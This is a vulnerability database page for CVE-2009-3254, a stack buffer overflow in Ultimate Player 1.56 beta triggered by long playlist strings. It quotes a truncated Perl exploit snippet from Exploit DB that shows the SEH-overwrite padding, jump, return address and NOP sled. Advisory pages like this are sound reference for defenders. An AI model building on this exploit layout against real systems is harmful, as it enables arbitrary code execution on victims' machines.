Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9.3
CVSSv2

CVE-2009-3254

Published: 18/09/2009 Updated: 19/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Subscribe to Ultimatevideosite

Vulnerability Summary

Multiple stack-based buffer overflows in Ultimate Player 1.56 beta allow remote malicious users to execute arbitrary code via a long string in a (1) .m3u or (2) .upl playlist file.

Vulnerable Product Search on Vulmon Subscribe to Product

ultimatevideosite ultimate player 1.56

Exploits

Exploit DB: Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)
#!/usr/bin/perl # by hack4love # hack4love@hotmailcom # Ultimate Player v 156 beta (m3u/upl) Universal Local BOF SEH #################################################################### my $bof="\x41" x 4108; my $nsh="\xEB\x06\x90\x90"; my $seh="\xb8\x15\xd1\x72";##tasted under sp2//sp3 univ my $nop="\x90" x 20; my $sec= "\xeb\x03\x59\xeb\x05\xe ...

References

CWE-119http://www.vupen.com/english/advisories/2009/2491http://www.exploit-db.com/exploits/9548https://nvd.nist.govhttps://www.exploit-db.com/exploits/9548/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
NULL pointer dereferenceCVE-2023-52689CVE-2024-23803client sideCVE-2023-52696information disclosureCVE-2024-35843CVE-2024-27130CVE-2023-52697
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook